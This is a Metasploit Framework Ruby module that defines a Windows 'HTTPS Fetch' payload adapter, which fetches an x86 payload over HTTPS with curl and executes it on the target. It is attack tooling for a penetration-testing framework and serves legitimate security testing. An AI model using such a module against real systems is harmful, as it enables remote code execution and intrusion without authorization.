1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
module MetasploitModule
7
  include Msf::Payload::Adapter::Fetch::Https
8
  include Msf::Payload::Adapter::Fetch::WindowsOptions
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name' => 'HTTPS Fetch',
15
        'Description' => 'Fetch and execute an x86 payload from an HTTPS server.',
16
        'Author' => 'Brendan Watters',
17
        'Platform' => 'win',
18
        'Arch' => ARCH_CMD,
19
        'License' => MSF_LICENSE,
20
        'AdaptedArch' => ARCH_X86,
21
        'AdaptedPlatform' => 'win'
22
      )
23
    )
24
    deregister_options('FETCH_COMMAND')
25
    register_options(
26
      [
27
        # Certutil does not support insecure mode
28
        Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CURL', %w[CURL]])
29
      ]
30
    )
31
  end
32
end
33

34